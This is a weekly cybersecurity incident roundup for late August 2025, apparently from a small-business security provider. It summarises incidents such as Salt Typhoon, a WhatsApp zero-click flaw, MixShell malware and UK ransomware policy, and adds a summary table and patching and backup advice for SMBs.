This Week's Cybersecurity Incidents – 24/08/2025 to 31/08/2025
Share
Salt Typhoon Campaign Compromises 600 Organisations Across the Globe
The Chinese-linked threat group Salt Typhoon has exploited vulnerabilities in edge and network devices to compromise as many as 600 organisations globally, including UK critical infrastructure, telecoms, and government services. The campaign demonstrates how attackers have been attempting to achieve long-term persistence via device-level vulnerabilities. The response for organizations worldwide, including CISA, advised patching of known exploited vulnerabilities immediately and disabling unused remote access. Companies are scanning device exposure and hardening perimeter defences. The future implications indicates SMBs are just as vulnerable, given the use of third-party VPNs and routers. Supply chains mean even smaller firms can be stepping-stones to more significant targets. Watch for more focus on vendor patch velocity and supply-chain cyber hygiene.
Sources: (Reuters) (BleepingComputer) (CISA Advisory)
WhatsApp Zero-Click Vulnerability Fixed – Business Users Affected
Meta has patched a zero-click vulnerability (CVE-2025-55177) in WhatsApp and WhatsApp Business that was paired with an Apple OS vulnerability to install spyware on less than 200 victims. While not widespread, the vulnerability impacted consumer and business users both. In response Meta and Apple released out-of-band emergency patches, which told all iOS/macOS users to update immediately. SMBs using WhatsApp Business for client communications were urged to adopt patch compliance and device security. The future implications of the expansion of zero-click exploits in messaging apps signals the expanding attack surface for SMBs that leverage consumer-grade applications as business-critical. Regulators will likely push for safer business messaging alternatives.
Sources: (TechCrunch) (The Hacker News) (WhatsApp Advisory)
CISA Admits Several Exploited Vulnerabilities to KEV Catalogue
On 25–26 August, CISA incorporated some new entries into its Known Exploited Vulnerabilities (KEV) catalogue and issued ICS advisories. The improvements include actively exploited vulnerabilities in different networking devices and enterprise applications. In response the regulated sectors organizations must provide high priority to remediation within CISA's necessary deadlines. Security teams are monitoring assets against KEV entries. The future implications for SMBs, the KEV list is still a free "must-patch-now" manual. It is more crucial than ever for smaller IT departments who can't keep up with all the vulnerabilities but must prioritize those that are currently being weaponised.
Sources: (CISA KEV) (US-CERT)
Legitimate Tools Weaponised: Velociraptor and VS Code Used for C2
Threat actors have been using open-source forensic tool Velociraptor to drop VS Code as a concealed command-and-control (C2) path. This allows attackers to blend in with normal administrative traffic. The response has defenders enhancing detection of abnormal tool usage and monitoring for out-of-pose VS Code execution. The future implications expect greater abuse of legitimate admin tools, where detection will increasingly depend on behavioural analytics rather than simple signature-based techniques. For SMBs, outsourced MDR providers can be a critical component in detecting such abuse.
Sources: (The Hacker News)
MixShell Malware Distributed Through Manufacturer Contact Forms
Researchers referenced a new campaign that distributed malware through supplier/manufacturer webforms – a social engineering spin from phishing emails to safe business portals. Victims who downloaded attached docs from supplier webforms unknowingly executed MixShell payloads. In response the countermeasures for manufacturers hardening webform validation, and security firms recommend SMBs to be cautious with unsolicited supplier docs. The future implications as supply-chain compromise continues to evolve, SMBs should look at incoming document processing. Expect growing investment in secure document gateways and enhanced supplier authentication processes.
Sources: (Security Affairs)
Massive Nevada Cyberattack Triggers Federal & State Response
A huge cyberattack in Nevada initiated coordinated federal and state incident response. The attack disrupted multiple regional services, demonstrating the operational impact of major intrusions. In response US authorities deployed rapid response teams, and affected organizations shifted to resume core services. The future implications of the attack highlights the very real consequences of downtime, influencing policy discussions about mandatory resilience practices for public and private organizations.
Sources: (CISA) (State of Nevada Advisory)
AI-Enabled Fraud & Agentic Attacks Increase
Security professionals cited a surge in cybercrooks leveraging AI to automate assaults, develop malware, and do reconnaissance. "Agentic" AI assaults, where nefarious AI agents run semi-autonomously, are a coming frontier. In response security vendors are releasing AI-fuelled defence products, but SMBs are slow to adopt because of cost and complexity. The future implications show that since AI lowers the technical barrier for perpetrators, SMBs are more exposed to persuasive fraud campaigns. Employee vigilance and multi-layer defences are still essential.
Sources: (Dark Reading) (Wired)
UK Policy Debate: Ban on Ransomware Payments Gains Momentum
The UK government intensified its drive towards prohibiting ransomware payments in the public sector and key infrastructure. Experts caution that this can redirect attacker interest to private SMBs as they are seen as softer targets. In response the insurers and trade bodies urge SMBs to implement foundational ransomware resilience patching, MFA, and verifiably offline backups. The future implications could mean that payments become illicit in certain industries. SMEs will suffer additional campaigns. Insurance costs and SMEs regulation will continue to rise further commodifying cyber hygiene.
Sources: (The Times) (Infosecurity Magazine)
|
Incident |
Type |
Region |
Sector |
Notes |
|
Salt Typhoon campaign |
APT / Device exploitation |
Global (incl. UK) |
Telecoms / Govt / Critical Infra |
600 orgs breached via network devices |
|
WhatsApp zero-click exploit |
Zero-click spyware |
Global |
SMB / Messaging |
Targeted <200 users, includes WhatsApp Business |
|
CISA KEV additions |
Exploited vulnerabilities |
US / Global |
IT / ICS |
Actively exploited flaws prioritised |
|
Velociraptor & VS Code misuse |
Tool abuse / C2 |
Global |
Enterprise / SMB |
Admin tools turned into covert C2 |
|
MixShell malware |
Supply-chain / Social engineering |
Global |
Manufacturing / SMB |
Malware via supplier contact forms |
|
Nevada cyberattack |
Regional disruption |
US |
State / Local govt |
Triggered federal-state response |
|
AI-enabled attacks |
Fraud / Reconnaissance |
Global |
SMB / Finance |
AI agents automating phishing & malware |
|
UK ransomware policy debate |
Regulatory shift |
UK |
Public sector / SMB |
Payment bans may shift targeting to SMEs |
SMB-Targeted Alerts
- SMBs must patch edge devices promptly – Salt Typhoon shows even small firms can be gateway businesses into larger ecosystems.
- Messaging security is critical – WhatsApp Business exploitation threat shows consumer apps need enterprise controls.
- Prepare for ransomware shifts – If UK public sector payments are banned, SMEs might become prime targets.
Conclusion
This week's activity underscores the global reach of cyberattacks, from nation-state monitoring to AI-aided phishing. For UK and global SMBs, the practical takeaway is straightforward: patch edge devices, secure messaging platforms, verify backups, and train employees. The confluence of policy adjustments, adversary creativity, and expanding supply-chain threats will make resilience planning unavoidable for smaller organizations.
Provided by Cyber Padlocking